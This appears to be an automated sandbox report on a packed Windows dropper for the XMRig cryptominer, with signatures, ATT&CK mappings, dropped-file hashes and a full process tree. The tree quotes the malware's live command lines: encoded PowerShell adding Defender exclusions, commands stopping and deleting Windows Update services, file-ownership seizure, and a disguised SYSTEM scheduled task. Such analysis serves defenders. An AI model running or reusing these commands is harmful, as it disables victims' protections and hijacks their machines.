Analysis

  • max time kernel
    300s
  • max time network
    273s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    01-07-2022 22:15

General

  • Target

    5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe

  • Size

    7.4MB

  • MD5

    26e4e44c3ba14cdaf5a9994192aaf2a5

  • SHA1

    1422aa1e3462da9cf4d96e3ade9310b383c40ebb

  • SHA256

    5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7

  • SHA512

    18babf7c5ee51848061cff36ffdbab814bf5f6404d067ddd48f16cb168a99a7964c6a6b49cd1e44f222c77527eed2736946ec7bdd484271d243efdf7c51903ad

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 14 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe
    "C:\Users\Admin\AppData\Local\Temp\5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:384
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Windows\Temp\run.bat" "
      2⤵
      • Drops startup file
      PID:1580
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Windows\Temp\lol.bat" "
      2⤵
        PID:1868
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1528
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1528 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1972
      • C:\Windows\Temp\setup.exe
        "C:\Windows\Temp\setup.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
          3⤵
            PID:1604
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
              4⤵
                PID:1036
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1692
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                4⤵
                  PID:1684
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                  4⤵
                    PID:1124
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:1976
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                      5⤵
                        PID:764
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                        5⤵
                          PID:836
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                          5⤵
                            PID:1600
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                            5⤵
                              PID:1976
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                              5⤵
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1868
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                              5⤵
                                PID:1784
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                5⤵
                                  PID:764
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:768
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:1600
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  5⤵
                                  • Modifies registry key
                                  PID:900
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                4⤵
                                  PID:1108
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                    5⤵
                                      PID:1600
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                              1⤵
                                PID:1868
                              • C:\Windows\system32\sc.exe
                                sc stop UsoSvc
                                1⤵
                                • Launches sc.exe
                                PID:1592
                              • C:\Windows\system32\sc.exe
                                sc stop dosvc
                                1⤵
                                • Launches sc.exe
                                PID:1228
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                1⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:1420
                              • C:\Windows\system32\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                1⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:1672
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                1⤵
                                • Modifies registry key
                                PID:768
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                1⤵
                                • Modifies registry key
                                PID:1684
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                                  2⤵
                                  • Creates scheduled task(s)
                                  PID:1036
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -standby-timeout-dc 0
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1228
                              • C:\Windows\system32\reg.exe
                                reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                1⤵
                                • Modifies security service
                                • Modifies registry key
                                PID:580
                              • C:\Windows\system32\powercfg.exe
                                powercfg /x -standby-timeout-ac 0
                                1⤵
                                  PID:1868
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  1⤵
                                  • Modifies registry key
                                  PID:1944
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  1⤵
                                  • Modifies registry key
                                  PID:1484
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-dc 0
                                  1⤵
                                    PID:1108
                                  • C:\Windows\system32\sc.exe
                                    sc stop bits
                                    1⤵
                                    • Launches sc.exe
                                    PID:1944
                                  • C:\Windows\system32\sc.exe
                                    sc stop wuauserv
                                    1⤵
                                    • Launches sc.exe
                                    PID:1484
                                  • C:\Windows\system32\powercfg.exe
                                    powercfg /x -hibernate-timeout-ac 0
                                    1⤵
                                      PID:1868
                                    • C:\Windows\system32\sc.exe
                                      sc stop WaaSMedicSvc
                                      1⤵
                                      • Launches sc.exe
                                      PID:1784
                                    • C:\Windows\system32\taskeng.exe
                                      taskeng.exe {DB4B40E1-7BF4-4530-8340-5FFAF46B8C2F} S-1-5-18:NT AUTHORITY\System:Service:
                                      1⤵
                                      • Loads dropped DLL
                                      PID:836
                                      • C:\Program Files\Chrome\updater.exe
                                        "C:\Program Files\Chrome\updater.exe"
                                        2⤵
                                          PID:1124
                                          • C:\Windows\System32\conhost.exe
                                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                                            3⤵
                                            • Drops file in Drivers directory
                                            • Suspicious use of SetThreadContext
                                            • Drops file in Program Files directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1084
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                                              4⤵
                                                PID:1604
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                                                  5⤵
                                                    PID:1160
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1124
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-dc 0
                                                    5⤵
                                                      PID:904
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -standby-timeout-dc 0
                                                      5⤵
                                                        PID:468
                                                      • C:\Windows\system32\powercfg.exe
                                                        powercfg /x -standby-timeout-ac 0
                                                        5⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1568
                                                      • C:\Windows\system32\powercfg.exe
                                                        powercfg /x -hibernate-timeout-ac 0
                                                        5⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1672
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                      4⤵
                                                        PID:976
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop UsoSvc
                                                          5⤵
                                                          • Launches sc.exe
                                                          PID:632
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop wuauserv
                                                          5⤵
                                                          • Launches sc.exe
                                                          PID:1592
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop dosvc
                                                          5⤵
                                                          • Launches sc.exe
                                                          PID:1604
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                                          5⤵
                                                          • Modifies registry key
                                                          PID:1160
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                                          5⤵
                                                          • Modifies registry key
                                                          PID:1684
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                                          5⤵
                                                          • Modifies registry key
                                                          PID:1672
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                                          5⤵
                                                          • Modifies registry key
                                                          PID:632
                                                        • C:\Windows\system32\takeown.exe
                                                          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                          5⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:540
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                                          5⤵
                                                          • Modifies registry key
                                                          PID:1564
                                                        • C:\Windows\system32\icacls.exe
                                                          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                                          5⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:956
                                                        • C:\Windows\system32\reg.exe
                                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                                          5⤵
                                                          • Modifies registry key
                                                          PID:1568
                                                        • C:\Windows\system32\reg.exe
                                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                                          5⤵
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          • Modifies registry key
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1160
                                                        • C:\Windows\system32\schtasks.exe
                                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                                          5⤵
                                                            PID:1108
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                            5⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:468
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                                            5⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:904
                                                          • C:\Windows\system32\schtasks.exe
                                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                            5⤵
                                                              PID:1932
                                                            • C:\Windows\system32\schtasks.exe
                                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                              5⤵
                                                                PID:1596
                                                              • C:\Windows\system32\schtasks.exe
                                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                                5⤵
                                                                  PID:1568
                                                                • C:\Windows\system32\schtasks.exe
                                                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                                                  5⤵
                                                                    PID:1060
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                                                    5⤵
                                                                    • Modifies registry key
                                                                    PID:1632
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                                                    5⤵
                                                                    • Drops file in Drivers directory
                                                                    • Drops file in Program Files directory
                                                                    • Modifies registry key
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1604
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc stop bits
                                                                    5⤵
                                                                    • Launches sc.exe
                                                                    PID:1672
                                                                  • C:\Windows\system32\sc.exe
                                                                    sc stop WaaSMedicSvc
                                                                    5⤵
                                                                    • Launches sc.exe
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1108
                                                                • C:\Windows\System32\conhost.exe
                                                                  C:\Windows\System32\conhost.exe
                                                                  4⤵
                                                                    PID:1808
                                                                    • C:\Windows\System32\conhost.exe
                                                                      "C:\Windows\System32\conhost.exe" "mjadcdpvfkxx"
                                                                      5⤵
                                                                        PID:964
                                                                    • C:\Windows\explorer.exe
                                                                      C:\Windows\explorer.exe mkapcxrks1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1684
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "-457161131395373217-207273979689948493-570349978-1129083170385191222-41583147"
                                                                1⤵
                                                                  PID:1420
                                                                • C:\Windows\system32\conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe "16786457817873884392099771313-16088549032145903801769930875-1647427490-1113225222"
                                                                  1⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1036

                                                                Network

                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                Execution

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Persistence

                                                                Modify Existing Service

                                                                2
                                                                T1031

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Privilege Escalation

                                                                Scheduled Task

                                                                1
                                                                T1053

                                                                Defense Evasion

                                                                Modify Registry

                                                                3
                                                                T1112

                                                                Virtualization/Sandbox Evasion

                                                                1
                                                                T1497

                                                                Impair Defenses

                                                                1
                                                                T1562

                                                                File Permissions Modification

                                                                1
                                                                T1222

                                                                Discovery

                                                                Query Registry

                                                                2
                                                                T1012

                                                                Virtualization/Sandbox Evasion

                                                                1
                                                                T1497

                                                                System Information Discovery

                                                                3
                                                                T1082

                                                                Impact

                                                                Service Stop

                                                                1
                                                                T1489

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Program Files\Chrome\updater.exe
                                                                  Filesize

                                                                  7.1MB

                                                                  MD5

                                                                  e5373f1e2c782659695c5cea587fddea

                                                                  SHA1

                                                                  4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                                  SHA256

                                                                  c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                                  SHA512

                                                                  2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                                • C:\Program Files\Chrome\updater.exe
                                                                  Filesize

                                                                  7.1MB

                                                                  MD5

                                                                  e5373f1e2c782659695c5cea587fddea

                                                                  SHA1

                                                                  4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                                  SHA256

                                                                  c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                                  SHA512

                                                                  2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                  Filesize

                                                                  60KB

                                                                  MD5

                                                                  589c442fc7a0c70dca927115a700d41e

                                                                  SHA1

                                                                  66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                                                  SHA256

                                                                  2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                                                  SHA512

                                                                  1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                  Filesize

                                                                  340B

                                                                  MD5

                                                                  6e5ea9f86637bbbee5997bbba8d61358

                                                                  SHA1

                                                                  43a60ef2a7cb9776d404841a52b2454b34e45ad5

                                                                  SHA256

                                                                  8214b7879b81e133a699c643f0aa624a19040907868fa92d61aaf3563d81eab3

                                                                  SHA512

                                                                  78ecfc2530a84c1f60185b276145f148c5ee5740717406e1d991d13298ea570b8a7e341b0abe866a2fec16db1c23e7194afd4c4dc6c02afa5b9a4a52be6abba2

                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\X3578UKA.txt
                                                                  Filesize

                                                                  604B

                                                                  MD5

                                                                  945cb45aed42d771a1cf7473fa47f5f4

                                                                  SHA1

                                                                  fc21b8725b669d6f9a5a2ddff3df647488d1d784

                                                                  SHA256

                                                                  45f8bf6f3d71265a9d6d0b92218dbee59c47127c5901c28d4d342930724db9d7

                                                                  SHA512

                                                                  2002c257725a458d730db9cbe6d6104b1719bb8696598cf205144a14fff32b696922a6d7e58dea74f697a8efcd77b2f485d8b472bf00c51583953e5ce10ddc19

                                                                • C:\Windows\Temp\lol.bat
                                                                  Filesize

                                                                  59B

                                                                  MD5

